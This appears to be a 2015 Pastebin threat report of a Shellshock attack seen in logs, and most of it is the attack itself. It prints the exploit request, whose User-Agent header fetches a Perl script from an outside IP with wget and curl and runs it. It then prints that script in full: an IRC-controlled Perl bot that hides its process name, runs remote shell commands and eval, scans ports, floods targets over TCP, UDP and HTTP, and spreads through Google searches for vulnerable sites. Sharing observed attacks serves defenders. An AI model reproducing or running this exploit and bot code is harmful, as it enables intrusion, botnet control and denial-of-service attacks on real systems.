Ledger Nano X - The secure hardware wallet
SHARE
TWEET

Shellshock Attempt: 209.92.176.24, 202.191.121.230

Neonprimetime Jan 13th, 2015 1,206 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Shellshock Attempt
  2. Reported by neonprimetime security
  3. http://neonprimetime.blogspot.com
  4.  
  5. ****
  6.  
  7. Source IP: 209.92.176.24
  8.  
  9. ****
  10.  
  11. GET /cgi-bin/test.cgi HTTP/1.0
  12.  
  13.  
  14. User-Agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://202.191.121.230/ou.pl;lwp-download http://202.191.121.230/ou.pl; curl -O http://202.191.121.230/ou.pl;perl ou.pl;rm -rf ou.pl*"
  15.  
  16.  
  17. ****
  18.  
  19. #!/usr/bin/perl
  20. my $processo =("suid","/usr/sbin/sshd","rpc.idmapd","auditd","crond","klogd -x");
  21.  
  22. my @titi = ("index.php?page=","main.php?page=");
  23.  
  24. my $goni = $titi[rand scalar @titi];
  25.  
  26. my $linas_max='3';
  27. my $sleep='7';
  28. my @adms=("Alex","Dragos","dan","MAZY");
  29. my @hostauth=("ame-team.ro");
  30. my @canais=("#sex");
  31. chop (my $nick = `uname`);
  32. my $servidor="209.92.176.23";
  33. my $ircname =("user");
  34. my $realname = ("user");
  35. my $porta='80';
  36. my $VERSAO = '0.5';
  37. $SIG{'INT'} = 'IGNORE';
  38. $SIG{'HUP'} = 'IGNORE';
  39. $SIG{'TERM'} = 'IGNORE';
  40. $SIG{'CHLD'} = 'IGNORE';
  41. $SIG{'PS'} = 'IGNORE';
  42. use IO::Socket;
  43. use Socket;
  44. use IO::Select;
  45. chdir("/tmp");
  46. $servidor="$ARGV[0]" if $ARGV[0];
  47. $0="$processo"."\0"x16;;
  48. my $pid=fork;
  49. exit if $pid;
  50. die "Problema com o fork: $!" unless defined($pid);
  51.  
  52. our %irc_servers;
  53. our %DCC;
  54. my $dcc_sel = new IO::Select->new();
  55.  
  56. $sel_cliente = IO::Select->new();
  57. sub sendraw {
  58.   if ($#_ == '1') {
  59.     my $socket = $_[0];
  60.     print $socket "$_[1]\n";
  61.   } else {
  62.       print $IRC_cur_socket "$_[0]\n";
  63.   }
  64. }
  65.  
  66. sub conectar {
  67.    my $meunick = $_[0];
  68.    my $servidor_con = $_[1];
  69.    my $porta_con = $_[2];
  70.  
  71.    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
  72.    if (defined($IRC_socket)) {
  73.      $IRC_cur_socket = $IRC_socket;
  74.  
  75.      $IRC_socket->autoflush(1);
  76.      $sel_cliente->add($IRC_socket);
  77.  
  78.      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
  79.      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
  80.      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  81.      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  82.      nick("$meunick");
  83.      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
  84.      sleep 1;
  85.    }
  86. }
  87. my $line_temp;
  88. while( 1 ) {
  89.    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  90.    delete($irc_servers{''}) if (defined($irc_servers{''}));
  91.    my @ready = $sel_cliente->can_read(0);
  92.    next unless(@ready);
  93.    foreach $fh (@ready) {
  94.      $IRC_cur_socket = $fh;
  95.      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  96.      $nread = sysread($fh, $msg, 4096);
  97.      if ($nread == 0) {
  98.         $sel_cliente->remove($fh);
  99.         $fh->close;
  100.         delete($irc_servers{$fh});
  101.      }
  102.      @lines = split (/\n/, $msg);
  103.  
  104.      for(my $c=0; $c<= $#lines; $c++) {
  105.        $line = $lines[$c];
  106.        $line=$line_temp.$line if ($line_temp);
  107.        $line_temp='';
  108.        $line =~ s/\r$//;
  109.        unless ($c == $#lines) {
  110.          parse("$line");
  111.        } else {
  112.            if ($#lines == 0) {
  113.              parse("$line");
  114.            } elsif ($lines[$c] =~ /\r$/) {
  115.                parse("$line");
  116.            } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  117.                parse("$line");
  118.            } else {
  119.                $line_temp = $line;
  120.            }
  121.        }
  122.       }
  123.    }
  124. }
  125.  
  126. sub parse {
  127.    my $servarg = shift;
  128.    if ($servarg =~ /^PING \:(.*)/) {
  129.      sendraw("PONG :$1");
  130.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  131.        my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
  132.        if ($args =~ /^\001VERSION\001$/) {
  133.          notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
  134.        }
  135.        if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
  136.        if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
  137.          if ($onde eq "$meunick"){
  138.            shell("$pn", "$args");
  139.          }
  140.          if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
  141.             my $natrix = $1;
  142.             my $arg = $2;
  143.             if ($arg =~ /^\!(.*)/) {
  144.               ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
  145.             } elsif ($arg =~ /^\@(.*)/) {
  146.                 $ondep = $onde;
  147.                 $ondep = $pn if $onde eq $meunick;
  148.                 bfunc("$ondep","$1");
  149.             } else {
  150.                 shell("$onde", "$arg");
  151.             }
  152.          }
  153.        }
  154.         }
  155.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  156.        if (lc($1) eq lc($meunick)) {
  157.          $meunick=$4;
  158.          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  159.        }
  160.    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  161.        nick("$meunick|".int rand(999999));
  162.    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  163.        $meunick = $2;
  164.        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  165.        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  166.        foreach my $canal (@canais) {
  167.          sendraw("JOIN $canal ddosit");
  168.        }
  169.    }
  170. }
  171.  
  172.  
  173. sub bfunc {
  174.   my $printl = $_[0];
  175.   my $funcarg = $_[1];
  176.   if (my $pid = fork) {
  177.      waitpid($pid, 0);
  178.   } else {
  179.       if (fork) {
  180.          exit;
  181.        } else {
  182.            if ($funcarg =~ /^portscan (.*)/) {
  183.              my $hostip="$1";
  184.              my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
  185.              my (@aberta, %porta_banner);
  186.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
  187.              foreach my $porta (@portas)  {
  188.                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
  189.                 if ($scansock) {
  190.                    push (@aberta, $porta);
  191.                    $scansock->close;
  192.                 }
  193.              }
  194.  
  195.              if (@aberta) {
  196.                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
  197.              } else {
  198.                sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
  199.              }
  200.            }
  201.            if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
  202.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
  203.              my $itime = time;
  204.              my ($cur_time);
  205.              $cur_time = time - $itime;
  206.              while ($3>$cur_time){
  207.              $cur_time = time - $itime;
  208.              &tcpflooder("$1","$2","$3");
  209.              }
  210.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
  211.            }
  212.            if ($funcarg =~ /^version/) {
  213.                 sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);
  214.                 }
  215.            if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
  216.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
  217.              srand;
  218.              my $itime = time;
  219.              my ($cur_time);
  220.              my ($exploited);
  221.              $boturl=$2;
  222.              $cur_time = time - $itime;$exploited = 0;
  223.                 while($1>$cur_time){
  224.                     $cur_time = time - $itime;
  225.                     @urls=fetch();
  226.                         foreach $url (@urls) {
  227.                         $cur_time = time - $itime;
  228.                         my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
  229.  
  230.                         $url =$path."/$goni$boturl" ;
  231.  
  232.  
  233.  
  234.  
  235.                         $page = http_query($url);
  236.                         $exploited = $exploited + 1;
  237.                     }
  238.                 }
  239.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
  240.            }
  241.            if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
  242.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
  243.              my $itime = time;
  244.              my ($cur_time);
  245.              $cur_time = time - $itime;
  246.              while ($2>$cur_time){
  247.              $cur_time = time - $itime;
  248.              my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
  249.              print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
  250.              close($socket);
  251.              }
  252.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
  253.            }
  254.            if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
  255.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
  256.              my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
  257.              $dtime = 1 if $dtime == 0;
  258.              my %bytes;
  259.              $bytes{igmp} = $2 * $pacotes{igmp};
  260.              $bytes{icmp} = $2 * $pacotes{icmp};
  261.              $bytes{o} = $2 * $pacotes{o};
  262.              $bytes{udp} = $2 * $pacotes{udp};
  263.              $bytes{tcp} = $2 * $pacotes{tcp};
  264.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
  265.            }
  266.            exit;
  267.        }
  268.   }
  269. }
  270.  
  271. sub ircase {
  272.   my ($kem, $printl, $case) = @_;
  273.  
  274.   if ($case =~ /^join (.*)/) {
  275.      j("$1");
  276.    }
  277.  
  278. if ($case =~ /^refresh (.*)/) {
  279. my $goni = $titi[rand scalar @titi];
  280.  }
  281.  
  282.    if ($case =~ /^part (.*)/) {
  283.       p("$1");
  284.    }
  285.    if ($case =~ /^rejoin\s+(.*)/) {
  286.       my $chan = $1;
  287.       if ($chan =~ /^(\d+) (.*)/) {
  288.         for (my $ca = 1; $ca <= $1; $ca++ ) {
  289.           p("$2");
  290.           j("$2");
  291.         }
  292.       } else {
  293.           p("$chan");
  294.           j("$chan");
  295.       }
  296.    }
  297.    if ($case =~ /^op/) {
  298.       op("$printl", "$kem") if $case eq "op";
  299.       my $oarg = substr($case, 3);
  300.       op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  301.    }
  302.    if ($case =~ /^deop/) {
  303.       deop("$printl", "$kem") if $case eq "deop";
  304.       my $oarg = substr($case, 5);
  305.       deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  306.    }
  307.    if ($case =~ /^msg\s+(\S+) (.*)/) {
  308.       msg("$1", "$2");
  309.    }
  310.    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
  311.       for (my $cf = 1; $cf <= $1; $cf++) {
  312.         msg("$2", "$3");
  313.       }
  314.    }
  315.    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
  316.       ctcp("$1", "$2");
  317.    }
  318.    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
  319.       for (my $cf = 1; $cf <= $1; $cf++) {
  320.         ctcp("$2", "$3");
  321.       }
  322.    }
  323.    if ($case =~ /^nick (.*)/) {
  324.       nick("$1");
  325.    }
  326.    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
  327.        conectar("$2", "$1", 6667);
  328.    }
  329.    if ($case =~ /^raw (.*)/) {
  330.       sendraw("$1");
  331.    }
  332.    if ($case =~ /^eval (.*)/) {
  333.      eval "$1";
  334.    }
  335. }
  336.  
  337. sub shell {
  338.   my $printl=$_[0];
  339.   my $comando=$_[1];
  340.   if ($comando =~ /cd (.*)/) {
  341.     chdir("$1") || msg("$printl", "No such file or directory");
  342.     return;
  343.   }
  344.   elsif ($pid = fork) {
  345.      waitpid($pid, 0);
  346.   } else {
  347.       if (fork) {
  348.          exit;
  349.        } else {
  350.            my @resp=`$comando 2>&1 3>&1`;
  351.            my $c=0;
  352.            foreach my $linha (@resp) {
  353.              $c++;
  354.              chop $linha;
  355.              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  356.              if ($c == "$linas_max") {
  357.                $c=0;
  358.                sleep $sleep;
  359.              }
  360.            }
  361.            exit;
  362.        }
  363.   }
  364. }
  365.  
  366. sub tcpflooder {
  367.  my $itime = time;
  368.  my ($cur_time);
  369.  my ($ia,$pa,$proto,$j,$l,$t);
  370.  $ia=inet_aton($_[0]);
  371.  $pa=sockaddr_in($_[1],$ia);
  372.  $ftime=$_[2];
  373.  $proto=getprotobyname('tcp');
  374.  $j=0;$l=0;
  375.  $cur_time = time - $itime;
  376.  while ($l<1000){
  377.   $cur_time = time - $itime;
  378.   last if $cur_time >= $ftime;
  379.   $t="SOCK$l";
  380.   socket($t,PF_INET,SOCK_STREAM,$proto);
  381.   connect($t,$pa)||$j--;
  382.   $j++;$l++;
  383.  }
  384.  $l=0;
  385.  while ($l<1000){
  386.   $cur_time = time - $itime;
  387.   last if $cur_time >= $ftime;
  388.   $t="SOCK$l";
  389.   shutdown($t,2);
  390.   $l++;
  391.  }
  392. }
  393.  
  394. sub udpflooder {
  395.   my $iaddr = inet_aton($_[0]);
  396.   my $msg = 'A' x $_[1];
  397.   my $ftime = $_[2];
  398.   my $cp = 0;
  399.   my (%pacotes);
  400.   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  401.  
  402.   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  403.   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  404.   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  405.   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  406.   return(undef) if $cp == 4;
  407.   my $itime = time;
  408.   my ($cur_time);
  409.   while ( 1 ) {
  410.      for (my $porta = 1; $porta <= 65000; $porta++) {
  411.        $cur_time = time - $itime;
  412.        last if $cur_time >= $ftime;
  413.        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
  414.        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
  415.        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
  416.        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
  417.  
  418.        for (my $pc = 3; $pc <= 255;$pc++) {
  419.          next if $pc == 6;
  420.          $cur_time = time - $itime;
  421.          last if $cur_time >= $ftime;
  422.          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
  423.          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
  424.        }
  425.      }
  426.      last if $cur_time >= $ftime;
  427.   }
  428.   return($cur_time, %pacotes);
  429. }
  430.  
  431. sub ctcp {
  432.    return unless $#_ == 1;
  433.    sendraw("PRIVMSG $_[0] :\001$_[1]\001");
  434. }
  435. sub msg {
  436.    return unless $#_ == 1;
  437.    sendraw("PRIVMSG $_[0] :$_[1]");
  438. }
  439. sub notice {
  440.    return unless $#_ == 1;
  441.    sendraw("NOTICE $_[0] :$_[1]");
  442. }
  443. sub op {
  444.    return unless $#_ == 1;
  445.    sendraw("MODE $_[0] +o $_[1]");
  446. }
  447. sub deop {
  448.    return unless $#_ == 1;
  449.    sendraw("MODE $_[0] -o $_[1]");
  450. }
  451. sub j { &join(@_); }
  452. sub join {
  453.    return unless $#_ == 0;
  454.    sendraw("JOIN $_[0]");
  455. }
  456. sub p { part(@_); }
  457. sub part {
  458.   sendraw("PART $_[0]");
  459. }
  460. sub nick {
  461.   return unless $#_ == 0;
  462.   sendraw("NICK $_[0]");
  463. }
  464. sub quit {
  465.   sendraw("QUIT :$_[0]");
  466. }
  467.  
  468. # Spreader
  469. # this 'spreader' code isnot mine, i dont know who coded it.
  470. # update: well, i just fix0red this shit a bit.
  471. #
  472.  
  473. sub fetch(){
  474.     my $rnd=(int(rand(9999)));
  475.     my $n= 80;
  476.     if ($rnd<5000) { $n<<=1;}
  477.     my $s= (int(rand(5)) * $n);
  478.  
  479. my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
  480.                 "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
  481.                 "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
  482.                 "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
  483.                 "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
  484.                 "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
  485.                 "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
  486.                 "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
  487.                 "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
  488.                 "vu","vn","ye","yu","cd","zm","zw","");
  489. my @str;
  490.  
  491. foreach $dom  (@dominios)
  492. {
  493.         push (@str,"allinurl:%22".$dom."/".$goni."%22");
  494. }
  495.  
  496.     my $query="www.google.com/search?q=";
  497.     $query.=$str[(rand(scalar(@str)))];
  498.     $query.="&num=$n&start=$s";
  499.  
  500.  
  501.     my @lst=();
  502.     my $page = http_query($query);
  503.     while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
  504.         if ($1 !~ m/google|cache|translate/){
  505.             push (@lst,$1);
  506.         }
  507.     }
  508.     return (@lst);
  509. }
  510.  
  511.  
  512. sub http_query($){
  513.     my ($url) = @_;
  514.     my $host=$url;
  515.     my $query=$url;
  516.  
  517.     my $page="";
  518.     $host =~ s/href=\"?http:\/\///;
  519.     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  520.     $query =~s/$host//;
  521.     if ($query eq "") {$query="/";};
  522.     eval {
  523.         local $SIG{ALRM} = sub { die "1";};
  524.         alarm 10;
  525.         my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
  526.         print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  527.         my @r = <$sock>;
  528.         $page="@r";
  529.         alarm 0;
  530.         close($sock);
  531.     };
  532.     return $page;
  533.  
  534. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top